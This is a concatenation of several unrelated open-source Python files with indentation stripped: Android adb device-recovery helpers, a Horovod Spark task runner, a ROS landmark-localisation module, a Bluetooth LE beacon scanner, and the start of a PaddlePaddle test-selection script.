'gce reconnect.' % str(state))
return False
return True
def get_device_path():
"""Gets a device path to be cached and used by reset_usb."""
def _get_usb_devices():
"""Returns a list of device objects containing a serial and USB path."""
usb_list_cmd = 'lsusb -v'
output = execute_command(usb_list_cmd, timeout=RECOVERY_CMD_TIMEOUT)
if output is None:
logs.log_error('Failed to populate usb devices using lsusb, '
'host restart might be needed.')
bad_state_reached()
devices = []
path = None
for line in output.splitlines():
match = LSUSB_BUS_RE.match(line)
if match:
path = '/dev/bus/usb/%s/%s' % (match.group(1), match.group(2))
continue
match = LSUSB_SERIAL_RE.match(line)
if path and match and match.group(1):
serial = match.group(1)
devices.append(DEVICE(serial, path))
return devices
def _get_device_path_for_serial():
"""Return device path. Assumes a simple ANDROID_SERIAL."""
devices = _get_usb_devices()
for device in devices:
if device_serial == device.serial:
return device.path
return None
def _get_device_path_for_usb():
"""Returns a device path.
Assumes ANDROID_SERIAL in the form "usb:<identifier>"."""
# Android serial may reference a usb device rather than a serial number.
device_id = device_serial[len('usb:'):]
bus_number = int(
open('/sys/bus/usb/devices/%s/busnum' % device_id).read().strip())
device_number = int(
open('/sys/bus/usb/devices/%s/devnum' % device_id).read().strip())
return '/dev/bus/usb/%03d/%03d' % (bus_number, device_number)
if is_gce():
return None
device_serial = environment.get_value('ANDROID_SERIAL')
if device_serial.startswith('usb:'):
return _get_device_path_for_usb()
return _get_device_path_for_serial()
def reset_usb():
"""Reset USB bus for a device serial."""
if is_gce():
# Nothing to do here.
return True
# App Engine does not let us import this.
import fcntl
# We need to get latest device path since it could be changed in reboots or
# adb root restarts.
try:
device_path = get_device_path()
except IOError:
# We may reach this state if the device is no longer available.
device_path = None
if not device_path:
# Try pulling from cache (if available).
device_path = environment.get_value('DEVICE_PATH')
if not device_path:
logs.log_warn('No device path found, unable to reset usb.')
return False
try:
with open(device_path, 'w') as f:
fcntl.ioctl(f, USBDEVFS_RESET)
except:
logs.log_warn('Failed to reset usb.')
return False
# Wait for usb to recover.
wait_for_device()
return True
def revert_asan_device_setup_if_needed():
"""Reverts ASan device setup if installed."""
if not environment.get_value('ASAN_DEVICE_SETUP'):
return
device_id = environment.get_value('ANDROID_SERIAL')
device_argument = '--device %s' % device_id
revert_argument = '--revert'
asan_device_setup_script_path = os.path.join(
environment.get_platform_resources_directory(), 'third_party',
'asan_device_setup.sh')
command = '%s %s %s' % (asan_device_setup_script_path, device_argument,
revert_argument)
execute_command(command, timeout=RECOVERY_CMD_TIMEOUT)
def run_as_root():
"""Restart adbd and runs as root."""
# Check if we are already running as root. If yes bail out.
if get_property('service.adb.root') == '1':
return
wait_for_device()
run_command('root')
wait_for_device()
def run_command(cmd,
log_output=False,
log_error=True,
timeout=None,
recover=True):
"""Run a command in adb shell."""
if isinstance(cmd, list):
cmd = ' '.join([str(i) for i in cmd])
if log_output:
logs.log('Running: adb %s' % cmd)
if not timeout:
timeout = ADB_TIMEOUT
output = execute_command(get_adb_command_line(cmd), timeout, log_error)
if not recover:
if log_output:
logs.log('Output: (%s)' % output)
return output
device_not_found_string_with_serial = DEVICE_NOT_FOUND_STRING.format(
serial=environment.get_value('ANDROID_SERIAL'))
if (output in [
DEVICE_HANG_STRING, DEVICE_OFFLINE_STRING,
device_not_found_string_with_serial
]):
logs.log_warn('Unable to query device, resetting device connection.')
if reset_device_connection():
# Device has successfully recovered, re-run command to get output.
# Continue execution and validate output next for |None| condition.
output = execute_command(get_adb_command_line(cmd), timeout, log_error)
else:
output = DEVICE_HANG_STRING
if output is DEVICE_HANG_STRING:
# Handle the case where our command execution hung. This is usually when
# device goes into a bad state and only way to recover is to restart it.
logs.log_warn('Unable to query device, restarting device to recover.')
hard_reset()
# Wait until we've booted and try the command again.
wait_until_fully_booted()
output = execute_command(get_adb_command_line(cmd), timeout, log_error)
if log_output:
logs.log('Output: (%s)' % output)
return output
def run_shell_command(cmd,
log_output=False,
log_error=True,
root=False,
timeout=None,
recover=True):
"""Run adb shell command (with root if needed)."""
def _escape_specials(command):
return command.replace('\\', '\\\\').replace('"', '\\"')
if isinstance(cmd, list):
cmd = ' '.join([str(i) for i in cmd])
if cmd[0] not in ['"', "'"]:
cmd = '"{}"'.format(_escape_specials(cmd))
if root:
root_cmd_prefix = 'su root sh -c '
# The arguments to adb shell need to be quoted, so if we're using
# su root sh -c, quote the combined command
full_cmd = 'shell \'{}{}\''.format(root_cmd_prefix, cmd)
else:
full_cmd = 'shell {}'.format(cmd)
return run_command(
full_cmd,
log_output=log_output,
log_error=log_error,
timeout=timeout,
recover=recover)
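# Illustrative quoting (hypothetical command): run_shell_command('ls /sdcard')
# issues `adb shell "ls /sdcard"`, while root=True issues
# `adb shell 'su root sh -c "ls /sdcard"'`.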
def run_fastboot_command(cmd, log_output=True, log_error=True, timeout=None):
"""Run a command in fastboot shell."""
if is_gce():
# We can't run fastboot commands on Android GCE instances.
return None
if isinstance(cmd, list):
cmd = ' '.join([str(i) for i in cmd])
if log_output:
logs.log('Running: fastboot %s' % cmd)
if not timeout:
timeout = ADB_TIMEOUT
output = execute_command(get_fastboot_command_line(cmd), timeout, log_error)
return output
def setup_adb():
"""Sets up ADB binary for use."""
adb_binary_path = get_adb_path()
# Make sure that ADB env var is set.
if not environment.get_value('ADB'):
environment.set_value('ADB', adb_binary_path)
def start_shell():
"""Stops shell."""
# Make sure we are running as root.
run_as_root()
run_shell_command('start')
wait_until_fully_booted()
def stop_shell():
"""Stops shell."""
# Make sure we are running as root.
run_as_root()
run_shell_command('stop')
def time_since_last_reboot():
"""Return time in seconds since last reboot."""
uptime_string = run_shell_command(['cat', '/proc/uptime']).split(' ')[0]
try:
return float(uptime_string)
except ValueError:
# Sometimes, adb can just hang or return null output. In these cases, just
# return infinity uptime value.
return float('inf')
def wait_for_device():
"""Waits indefinitely for the device to come online."""
run_command('wait-for-device', timeout=RECOVERY_CMD_TIMEOUT)
def wait_until_fully_booted():
"""Wait until device is fully booted or timeout expires."""
def boot_completed():
expected = '1'
result = run_shell_command('getprop sys.boot_completed', log_error=False)
return result == expected
def drive_ready():
expected = '0'
result = run_shell_command('\'test -d "/"; echo $?\'', log_error=False)
return result == expected
def package_manager_ready():
expected = 'package:/system/framework/framework-res.apk'
result = run_shell_command('pm path android', log_error=False)
if not result:
return False
# Ignore any extra messages before or after the result we want.
return expected in result.splitlines()
# Make sure we are not already recursing inside this function.
if utils.is_recursive_call():
return False
# Wait until device is online.
wait_for_device()
start_time = time.time()
is_boot_completed = False
is_drive_ready = False
is_package_manager_ready = False
while time.time() - start_time < REBOOT_TIMEOUT:
# TODO(mbarbella): Investigate potential optimizations.
# The package manager check should also work for shell restarts.
if not is_drive_ready:
is_drive_ready = drive_ready()
if not is_package_manager_ready:
is_package_manager_ready = package_manager_ready()
if not is_boot_completed:
is_boot_completed = boot_completed()
if is_drive_ready and is_package_manager_ready and is_boot_completed:
return True
time.sleep(BOOT_WAIT_INTERVAL)
factory_reset()
logs.log_fatal_and_exit(
'Device failed to finish boot. Reset to factory settings and exited.')
# Not reached.
return False
def write_command_line_file(command_line, app_path):
"""Write command line file with command line argument for the application."""
command_line_path = environment.get_value('COMMAND_LINE_PATH')
if not command_line_path:
return
# Algorithm for filtering current command line.
# 1. Remove |APP_PATH| from front.
# 2. Add 'chrome ' to start.
  # 3. Strip whitespace at start and end.
command_line_without_app_path = command_line.replace('%s ' % app_path, '')
command_line_file_contents = 'chrome %s' % (
command_line_without_app_path.strip())
write_data_to_file(command_line_file_contents, command_line_path)
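# Worked example (hypothetical values): with app_path '/system/bin/app' and
# command_line '/system/bin/app --foo', the file contents become 'chrome --foo'.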
def write_data_to_file(contents, file_path):
"""Writes content to file."""
# If this is a file in /system, we need to remount /system as read-write and
# after file is written, revert it back to read-only.
is_system_file = file_path.startswith('/system')
if is_system_file:
remount()
# Write file with desired contents.
run_shell_command("\"echo -n '%s' | su root dd of=%s\"" % (contents.replace(
'"', '\\"'), file_path))
  # Make the command line file readable.
run_shell_command('chmod 0644 %s' % file_path, root=True)
if is_system_file:
reboot()
wait_until_fully_booted()
|
__init__.py | # Copyright 2019 Uber Technologies, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
import threading
import time
from horovod.spark.task import task_info, task_service
from horovod.spark.task.task_info import get_available_devices
from horovod.spark.driver import driver_service
from horovod.run.common.util import codec, secret
def _parent_process_monitor(initial_ppid):
try:
while True:
if initial_ppid != os.getppid():
# Parent process died, terminate
os._exit(1)
time.sleep(1)
except:
# Avoids an error message during Python interpreter shutdown.
pass
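# When the parent dies, the orphaned child is re-parented and os.getppid()
# changes, which is what the loop above detects; os._exit(1) terminates
# immediately, skipping interpreter cleanup.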
def task_exec(driver_addresses, settings, rank_env):
# Die if parent process terminates
bg = threading.Thread(target=_parent_process_monitor, args=(os.getppid(),))
bg.daemon = True
bg.start()
key = codec.loads_base64(os.environ[secret.HOROVOD_SECRET_KEY])
rank = int(os.environ[rank_env])
driver_client = driver_service.SparkDriverClient(driver_addresses, key,
verbose=settings.verbose)
task_index = driver_client.task_index_by_rank(rank)
task_addresses = driver_client.all_task_addresses(task_index)
task_client = task_service.SparkTaskClient(task_index, task_addresses, key,
verbose=settings.verbose)
task_info.set_resources(task_client.resources())
fn, args, kwargs = driver_client.code()
result = fn(*args, **kwargs)
task_client.register_code_result(result)
|
lrs.py | import rospy
import pickle
import os
import time
import math
import yaml
import sympy as sp
import numpy as np
from scipy.optimize import minimize
from threading import Thread
from ar_track_alvar_msgs.msg import AlvarMarkers
from nav_msgs.msg import Odometry
from geometry_msgs.msg import PoseWithCovarianceStamped
class Marker:
LIMIT = 50
def __init__(self, m_id=None, known_location=(None, None)):
self.id = m_id
self.logged = False
self.visible_flag = False
self.known_x, self.known_y = known_location
self.observed_positions = []
self.distance_to_robot = 999
def update_distance(self, pose):
_, x, y = self.loc()
self.distance_to_robot = math.sqrt((y - pose[1]) ** 2 + (x - pose[0]) ** 2)
def observed(self, x, y):
"""
Append to observed locations
"""
if len(self.observed_positions) == self.LIMIT:
self.observed_positions.pop(0)
self.observed_positions.append([x, y])
def kloc(self, convert=False):
"""
Return known location
"""
if convert:
return np.array([self.known_x, self.known_y, 1])
return self.known_x, self.known_y
def loc(self, convert=False):
"""
Return observed location
"""
if len(self.observed_positions) == 0:
return (0, None, None)
med = np.median(self.observed_positions, axis=0)
if convert:
return np.array([med[0], med[1], 1])
return self.accuracy(), med[0], med[1]
def visible(self, flag):
self.visible_flag = flag if self.id != -1 else True
def accuracy(self):
if self.id == -1:
return 1.0
return len(self.observed_positions) / self.LIMIT
class LRS:
LIMIT = 20
def __init__(self, driver, clean=False):
self.config = yaml.load(open("./config/config.yaml"), Loader=yaml.FullLoader)
self.driver_instance = driver
self.visible_landmarks = 0
self.pose = None
self.recovered = False
self.dictionary = dict()
self.M_TRANS = None
if (
os.path.exists("/tmp/LRS_matrix.bak")
and os.path.exists("/tmp/LRS_landmarks.bak")
and not clean
):
self.recovered = True
bakfile = open("/tmp/LRS_matrix.bak", "rb")
self.M_TRANS = pickle.load(bakfile)
self.update_MT()
bakfile.close()
bakfile = open("/tmp/LRS_landmarks.bak", "rb")
self.dictionary = pickle.load(bakfile)
bakfile.close()
else:
self.dictionary[-1] = Marker(
-1,
(
self.config["initial_position"]["x"],
self.config["initial_position"]["y"],
),
)
landmarks = yaml.load(
open("./config/landmarks.yaml"), Loader=yaml.FullLoader
)
for val in landmarks["landmarks"]:
m_id, x, y = val.values()
self.dictionary[m_id] = Marker(m_id, (x, y))
self.worker = Thread(name="LRS_worker", target=self.daemon_worker)
self.worker.setDaemon(True)
self.worker.start()
self.crs_worker = Thread(name="LRS_CRS", target=self.daemon_crs_worker)
self.crs_worker.setDaemon(True)
self.crs_worker.start()
def daemon_crs_worker(self):
rospy.loginfo("LRS Crash Recovery System is starting")
try:
while not rospy.core.is_shutdown():
try:
bakfile = open("/tmp/LRS_matrix.bak", "wb")
pickle.dump(self.M_TRANS, bakfile)
bakfile.close()
bakfile = open("/tmp/LRS_landmarks.bak", "wb")
pickle.dump(self.dictionary, bakfile)
bakfile.close()
rospy.rostime.wallsleep(1.0)
except Exception as why:
rospy.logerr("Error in LRS CRS... Recovering...")
rospy.logerr(repr(why))
except Exception as why:
rospy.logfatal("LRS Crash Recovery System halted!")
def daemon_worker(self):
rospy.loginfo("Landmark Recognition System waiting for initialization...")
try:
rospy.Subscriber(
"/ar_pose_marker", AlvarMarkers, lambda p: self.commit(p.markers),
)
rospy.Subscriber(
self.config["odometry_topic"], Odometry, self.update_pose,
)
rospy.wait_for_message(self.config["odometry_topic"], Odometry)
# Save starting point and rcp pose for that
if not self.recovered:
self.dictionary[-1].observed(
self.pose[0], self.pose[1],
)
else:
rospy.loginfo("Recovered from backup file.")
rospy.wait_for_message("/ar_pose_marker", AlvarMarkers)
while not rospy.core.is_shutdown():
try:
if self.has_landmarks():
px, py = self.pose
for m_id, m in self.dictionary.items():
a, _, _ = m.loc()
x, y = m.kloc()
if a > 0:
m.update_distance((px, py))
if m_id != -1 and a == 1 and not m.logged:
rospy.loginfo(
"Locked on Marker {} -> ({}, {})".format(m_id, x, y)
)
m.logged = True
# * Calculate Transformation Matrix
if self.visible_landmarks > 0:
# Sort landmarks
landmarks = [v for k, v in self.dictionary.items()]
landmarks = sorted(
landmarks,
key=lambda m: (
m.visible_flag,
m.accuracy(),
-m.distance_to_robot,
),
reverse=True,
)
                        # Remove landmarks with no observed position or insufficient accuracy
landmarks = [
l
for l in landmarks
if len(l.observed_positions) > 0 and l.accuracy() >= 0.8
]
if len(landmarks) < 2:
continue
# Get best two landmarks
p1_m, p2_m = landmarks[:2]
p1_fr0, p1_fr1 = p1_m.loc(True), p1_m.kloc(True)
p2_fr0, p2_fr1 = p2_m.loc(True), p2_m.kloc(True)
# If we have only 2 landmarks then create 2 new points between these two landmarks
if len(landmarks) == 2:
md1_fr0 = np.array(
[
p1_fr0[0] + (1 / 3) * (p2_fr0[0] - p1_fr0[0]),
p1_fr0[1] + (1 / 3) * (p2_fr0[1] - p1_fr0[1]),
1,
]
)
md1_fr1 = np.array(
[
p1_fr1[0] + (1 / 3) * (p2_fr1[0] - p1_fr1[0]),
p1_fr1[1] + (1 / 3) * (p2_fr1[1] - p1_fr1[1]),
1,
]
)
md2_fr0 = np.array(
[
p1_fr0[0] + (2 / 3) * (p2_fr0[0] - p1_fr0[0]),
p1_fr0[1] + (2 / 3) * (p2_fr0[1] - p1_fr0[1]),
1,
]
)
md2_fr1 = np.array(
[
p1_fr1[0] + (2 / 3) * (p2_fr1[0] - p1_fr1[0]),
p1_fr1[1] + (2 / 3) * (p2_fr1[1] - p1_fr1[1]),
1,
]
)
elif len(landmarks) == 3:
                            # If there are 3 landmarks, create a midpoint between the two best landmarks
md1_m = landmarks[2]
md1_fr0, md1_fr1 = md1_m.loc(True), md1_m.kloc(True)
md2_fr0 = np.array(
[
p1_fr0[0] + (1 / 2) * (p2_fr0[0] - p1_fr0[0]),
p1_fr0[1] + (1 / 2) * (p2_fr0[1] - p1_fr0[1]),
1,
]
)
md2_fr1 = np.array(
[
p1_fr1[0] + (1 / 2) * (p2_fr1[0] - p1_fr1[0]),
p1_fr1[1] + (1 / 2) * (p2_fr1[1] - p1_fr1[1]),
1,
]
)
else:
md1_m = landmarks[2]
md1_fr0, md1_fr1 = md1_m.loc(True), md1_m.kloc(True)
md2_m = landmarks[3]
md2_fr0, md2_fr1 = md2_m.loc(True), md2_m.kloc(True)
sp_x, sp_y, sp_t, sp_s = sp.symbols("sp_x sp_y sp_t sp_s")
sp_M_trans = sp.Matrix(
(
(sp_s * sp.cos(sp_t), -sp.sin(sp_t), 0),
(sp.sin(sp_t), sp_s * sp.cos(sp_t), 0),
(sp_x, sp_y, 1),
)
)
sp_eq0 = sp.Matrix(1, 3, p1_fr0) * sp_M_trans
sp_eq1 = sp.Matrix(1, 3, p2_fr0) * sp_M_trans
sp_eq2 = sp.Matrix(1, 3, md1_fr0) * sp_M_trans
sp_eq3 = sp.Matrix(1, 3, md2_fr0) * sp_M_trans
sp_A = sp.Matrix((sp_eq0, sp_eq1, sp_eq2, sp_eq3))
b_np = np.array((p1_fr1, p2_fr1, md1_fr1, md2_fr1))
delta = lambda result: np.sum(
np.abs(np.array(result) - b_np)
)
f = lambda args: delta(
sp_A.evalf(
subs={
sp_x: args[0],
sp_y: args[1],
sp_t: args[2],
sp_s: args[3],
}
)
)
result = minimize(
f, [0, 0, 0, 1], method="L-BFGS-B", tol=1e-5
)
if result.success:
self.update_MT(
np.array(
[
[
result.x[3] * math.cos(result.x[2]),
-math.sin(result.x[2]),
0,
],
[
math.sin(result.x[2]),
result.x[3] * math.cos(result.x[2]),
0,
],
[result.x[0], result.x[1], 1],
]
),
f(result.x),
)
rospy.rostime.wallsleep(1.5)
except Exception as why:
rospy.logerr("Error in LRS... Recovering...")
rospy.logerr(repr(why))
except Exception as why:
rospy.logfatal("Landmark Recognition System halted!")
def update_MT(self, MT=None, error=None):
        if MT is not None:
if self.M_TRANS is None:
self.M_TRANS = [(error, time.time(), MT)]
elif len(self.M_TRANS) < self.LIMIT:
self.M_TRANS.append((error, time.time(), MT))
else:
self.M_TRANS.sort(key=lambda x: -x[0])
if error < self.M_TRANS[0][0]:
self.M_TRANS.pop(0)
self.M_TRANS.append((error, time.time(), MT))
self.M_TRANS.sort(key=lambda x: x[0])
groups = [[self.M_TRANS[0]]]
for x in self.M_TRANS[1:]:
if abs(x[0] - groups[-1][-1][0]) <= 0.1:
groups[-1].append(x)
else:
groups.append([x])
best = sorted(groups[0], key=lambda x: -x[1])
self.driver_instance.M_T = best[0][2]
self.driver_instance.M_T_stats = (best[0][0], best[0][1])
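    # update_MT keeps up to LIMIT (error, timestamp, matrix) candidates,
    # evicting the worst-error entry when full; it then groups candidates whose
    # errors lie within 0.1 of each other and publishes the most recent matrix
    # from the best-error group to the driver.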
def theta_df(self, unit1, unit2):
unit1 = math.degrees(unit1)
unit2 = math.degrees(unit2)
phi = abs(unit2 - unit1) % 360
sign = 1
# used to calculate sign
if not (
(unit1 - unit2 >= 0 and unit1 - unit2 <= 180)
or (unit1 - unit2 <= -180 and unit1 - unit2 >= -360)
):
sign = -1
if phi > 180:
result = 360 - phi
else:
result = phi
return math.radians(result * sign)
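    # Signed smallest angular difference between two headings, e.g.
    # theta_df(math.radians(10), math.radians(350)) ->  math.radians(20)
    # theta_df(math.radians(350), math.radians(10)) -> -math.radians(20)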
def update_pose(self, payload):
x = payload.pose.pose.position.x
y = payload.pose.pose.position.y
self.pose = x, y
def commit(self, markers):
visible_ids = [marker.id for marker in markers]
self.visible_landmarks = len(visible_ids)
for m_id, m in self.dictionary.items():
if not m_id in visible_ids:
m.visible(False)
for marker in markers:
m_id = marker.id
x = marker.pose.pose.position.x
y = marker.pose.pose.position.y
if m_id in self.dictionary:
self.dictionary[m_id].observed(x, y)
self.dictionary[m_id].visible(True)
def has_landmarks(self):
for _, m in self.dictionary.items():
if m.accuracy() == 1 and m.id != -1:
return True
return False
|
ScanBeaconUtility.py | # https://github.com/bowdentheo/BLE-Beacon-Scanner
class Beacon_Obj(object):
mac = str()
rssi = int()
uuid = str()
tx_power = int()
major = int()
minor = int()
tipo = str()
empresa = str()
def __init__(self, mac: str, rssi: int, uuid: str, tx: int, maj: int, min: int, tip: str, company: str):
self.mac = mac
self.rssi = rssi
self.uuid = uuid
self.tx_power = tx
self.major = maj
self.minor = min
self.tipo = tip
self.empresa = company
def getJson(self):
return self.__dict__
class beacontools:
import sys
import struct
import bluetooth._bluetooth as bluez
from multiprocessing import Process, Queue
import time
OGF_LE_CTL = 0x08
OCF_LE_SET_SCAN_ENABLE = 0x000C
BEACONs_SCANNED = dict()
def __init__(self, dev_id, time_use):
self.proc = self.Process(target=self.__continue_process)
self.time_use = time_use
try:
self.sock = self.bluez.hci_open_dev(dev_id)
print("\n *** Looking for BLE Beacons ***\n")
except:
self.sock = None
print("Error accessing bluetooth")
self.queue = self.Queue()
def hci_enable_le_scan(self):
if self.sock is not None:
self.hci_toggle_le_scan(0x01)
def hci_disable_le_scan(self):
if self.sock is not None:
self.hci_toggle_le_scan(0x00)
def hci_toggle_le_scan(self, enable):
if self.sock is not None:
cmd_pkt = self.struct.pack("<BB", enable, 0x00)
self.bluez.hci_send_cmd(self.sock, self.OGF_LE_CTL, self.OCF_LE_SET_SCAN_ENABLE, cmd_pkt)
def packetToString(self, packet):
"""
Returns the string representation of a raw HCI packet.
"""
if self.sys.version_info > (3, 0):
return ''.join('%02x' % self.struct.unpack("B", bytes([x]))[0] for x in packet)
else:
return ''.join('%02x' % self.struct.unpack("B", x)[0] for x in packet)
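    # e.g. packetToString(b'\x04\x3e\x2a') returns '043e2a'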
def parse_events(self, loop_count=100):
        # default URL prefix, in case the packet carries an unknown scheme code
        prefix = ''
if self.sock is not None:
# old_filter = self.sock.getsockopt( self.bluez.SOL_HCI, self.bluez.HCI_FILTER, 14)
flt = self.bluez.hci_filter_new()
self.bluez.hci_filter_all_events(flt)
self.bluez.hci_filter_set_ptype(flt, self.bluez.HCI_EVENT_PKT)
self.sock.setsockopt(self.bluez.SOL_HCI, self.bluez.HCI_FILTER, flt)
results = []
for i in range(0, loop_count):
packet = self.sock.recv(255)
# ptype, event, plen = self.struct.unpack("BBB", packet[:3])
packetOffset = 0
dataString = self.packetToString(packet)
"""
                If the bluetooth device is a beacon then show the beacon.
"""
# print (dataString)
if (dataString[34:42] == '0303aafe') and (dataString[44:50] == '16AAFE'):
"""
Selects parts of the bluetooth packets.
"""
broadcastType = dataString[50:52]
if broadcastType == '00':
type = "Eddystone UID"
namespace = dataString[54:74].upper()
instance = dataString[74:86].upper()
resultsArray = [
{"type": type, "namespace": namespace, "instance": instance}]
return resultsArray
elif broadcastType == '10':
type = "Eddystone URL"
urlprefix = dataString[54:56]
if urlprefix == '00':
prefix = 'http://www.'
elif urlprefix == '01':
prefix = 'https://www.'
elif urlprefix == '02':
prefix = 'http://'
elif urlprefix == '03':
prefix = 'https://'
hexUrl = dataString[56:][:-2]
if self.sys.version_info[0] == 3:
url = prefix + bytes.fromhex(hexUrl).decode('utf-8')
rssi, = self.struct.unpack("b", bytes([packet[packetOffset - 1]]))
else:
url = prefix + hexUrl.decode("hex")
rssi, = self.struct.unpack("b", packet[packetOffset - 1])
resultsArray = [{"type": type, "url": url}]
return resultsArray
elif broadcastType == '20':
type = "Eddystone TLM"
resultsArray = [{"type": type}]
return resultsArray
elif broadcastType == '30':
type = "Eddystone EID"
resultsArray = [{"type": type}]
return resultsArray
elif broadcastType == '40':
type = "Eddystone RESERVED"
resultsArray = [{"type": type}]
return resultsArray
if dataString[38:46] == '4c000215':
"""
Selects parts of the bluetooth packets.
"""
type = "iBeacon"
uuid = dataString[46:54] + "-" + dataString[54:58] + "-" + dataString[58:62] + "-" + dataString[
62:66] + "-" + dataString[
66:78]
major = dataString[78:82]
minor = dataString[82:86]
majorVal = int("".join(major.split()[::-1]), 16)
minorVal = int("".join(minor.split()[::-1]), 16)
"""
Organises Mac Address to display properly
"""
scrambledAddress = dataString[14:26]
fixStructure = iter(
"".join(reversed([scrambledAddress[i:i + 2] for i in range(0, len(scrambledAddress), 2)])))
macAddress = ':'.join(a + b for a, b in zip(fixStructure, fixStructure))
if self.sys.version_info[0] == 3:
rssi, = self.struct.unpack("b", bytes([packet[packetOffset - 1]]))
else:
rssi, = self.struct.unpack("b", packet[packetOffset - 1])
resultsArray = [{"type": type, "uuid": uuid, "major": majorVal, "minor": minorVal, "rssi": rssi,
"macAddress": macAddress}]
for item in resultsArray:
beacon = Beacon_Obj(item['macAddress'], item['rssi'], item['uuid'], 0, item['major'],
item['minor'], item['type'], item['uuid'][0:8])
self.BEACONs_SCANNED[beacon.uuid] = beacon
return resultsArray
return results
return []
def __continue_process(self):
self.time_sleep = self.time.time()
while True:
self.parse_events(10)
self.time.sleep(0.25)
if (int(abs(self.time_sleep - self.time.time()) * 100) / 100) >= self.time_use:
self.queue.put(self.BEACONs_SCANNED)
self.BEACONs_SCANNED = dict()
self.time_sleep = self.time.time()
def start_continue_process(self):
self.hci_enable_le_scan()
self.proc.start()
def detener_continue_process(self):
self.proc.terminate()
self.proc.join()
def get_beacons(self):
return self.queue.get()
class Beacon_FCV:
from multiprocessing import Process, Queue
import time
import numpy as np
tiempo_procesar = 5
queue = Queue()
size_vector = 10
HISTORY_BEACON_SCAN = dict()
BEACONs_SCANNED = dict()
HISTORY_MORE_NEAR_BEACON = ["" for _ in range(
size_vector)] # Guardo un historico de todos los uuid mas cercanos en cada periodo de escaneo
def __init__(self, dev_id, time_use):
self.scan_beacon = beacontools(dev_id, time_use)
self.scan_beacon.start_continue_process()
self.tiempo_procesar = time_use
self.proc = self.Process(target=self.__procesar_escaneo)
self.proc.start()
def __vector_vacio(self, size_vector=10):
return [int(i) for i in list(self.np.zeros(size_vector))]
@staticmethod
def __diff(list1, list2):
c = set(list1).union(set(list2)) # or c = set(list1) | set(list2)
d = set(list1).intersection(set(list2)) # or d = set(list1) & set(list2)
return list(c - d)
def __procesar_escaneo(self):
while True:
self.BEACONs_SCANNED = self.scan_beacon.get_beacons()
# for uuid, beacon_class in self.BEACONs_SCANNED.items():
# print(beacon_class.getJson())
mas_cercano = {'rssi': -150}
for uuid, beacon_class in self.BEACONs_SCANNED.items():
if mas_cercano['rssi'] < beacon_class.rssi:
mas_cercano['rssi'] = beacon_class.rssi
mas_cercano['uuid'] = uuid
mas_cercano['class'] = beacon_class
if not uuid in self.HISTORY_BEACON_SCAN:
OBJ = dict()
OBJ['beacon'] = beacon_class
OBJ['history'] = self.__vector_vacio(self.size_vector)
self.HISTORY_BEACON_SCAN[uuid] = OBJ
else:
historico = self.HISTORY_BEACON_SCAN[uuid]['history']
for i in range(self.size_vector - 1, 0, -1):
historico[i] = historico[i - 1]
historico[0] = beacon_class.rssi
self.HISTORY_BEACON_SCAN[uuid]['history'] = historico
# print(beacon_class.getJson())
for i in range(self.size_vector - 1, 0, -1):
self.HISTORY_MORE_NEAR_BEACON[i] = self.HISTORY_MORE_NEAR_BEACON[i - 1]
self.HISTORY_MORE_NEAR_BEACON[0] = mas_cercano['uuid'] if len(mas_cercano) > 1 else ""
uuid_beacons_this_scan = [uuid for uuid in self.BEACONs_SCANNED]
all_uuid_beacons_scan = [uuid for uuid in self.HISTORY_BEACON_SCAN]
for uuid_no_vistos_en_este_escaneo in self.__diff(all_uuid_beacons_scan, uuid_beacons_this_scan):
historico = self.HISTORY_BEACON_SCAN[uuid_no_vistos_en_este_escaneo]['history']
for i in range(self.size_vector - 1, 0, -1):
historico[i] = historico[i - 1]
historico[0] = 0
self.HISTORY_BEACON_SCAN[uuid_no_vistos_en_este_escaneo]['history'] = historico
respuesta = (False, "", 0)
if self.HISTORY_MORE_NEAR_BEACON[0] != "":
if self.HISTORY_MORE_NEAR_BEACON[0] == self.HISTORY_MORE_NEAR_BEACON[1]:
respuesta = (True, self.HISTORY_MORE_NEAR_BEACON[0], mas_cercano['rssi'])
else:
respuesta = (False, self.HISTORY_MORE_NEAR_BEACON[0], mas_cercano['rssi'])
self.queue.put(respuesta)
self.time.sleep(self.tiempo_procesar)
def terminar_procesos_beacon(self):
self.scan_beacon.detener_continue_process()
self.proc.terminate()
def get_history(self):
return self.HISTORY_BEACON_SCAN
def get_scan_actual(self):
return self.queue.get()
|
jetson_infer_op.py | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import os
import math
import argparse
from threading import Thread
# some particular ops
black_list = [
# special op
'test_custom_relu_op_setup',
'test_custom_relu_op_jit',
'test_python_operator_overriding',
'test_c_comm_init_all_op',
'test_c_embedding_op',
# train op
'test_imperative_optimizer',
'test_imperative_optimizer_v2',
'test_momentum_op',
'test_sgd_op',
'test_sgd_op_bf16',
'test_warpctc_op',
# sync op
'test_sync_batch_norm_op',
# case too large
'test_reduce_op',
'test_transpose_op'
]
op_diff_list = [
# diff<1E-7,it's right
'test_elementwise_mul_op'
]
def parse_arguments():
"""
:return:
"""
parser = argparse.ArgumentParser()
parser.add_argument(
'--shell_name',
type=str,
default='get_op_list.sh',
help='please input right name')
parser.add_argument(
'--op_list_file',
type=str,
default='list_op.txt',
help='please input right name')
return parser.parse_args()
def search_file(file_name, path, file_path):
"""
:param file_name:target
:param path: to search this path
:param file_path: result
:return:
"""
for item in os.listdir(path):
if os.path.isdir(os.path.join(path, item)):
search_file(file_name, os.path.join(path, item), file_path)
else:
if file_name in item:
file_path.append(os.path.join(path, file_name))
def get_prefix(line, end_char='d'):
"""
:param line: string_demo
:param end_char: copy the prefix of string_demo until end_char
:return: prefix
"""
i = 0
prefix = ''
while (line[i] != end_char):
prefix += line[i]
i += 1
return prefix
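# e.g. get_prefix("    def test_check_grad(self):") returns the four leading
# spaces, since copying stops at the first 'd' (the one in 'def').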
def add_import_skip_return(file, pattern_import, pattern_skip, pattern_return):
"""
:param file: the file need to be changed
:param pattern_import: import skip
:param pattern_skip: @skip
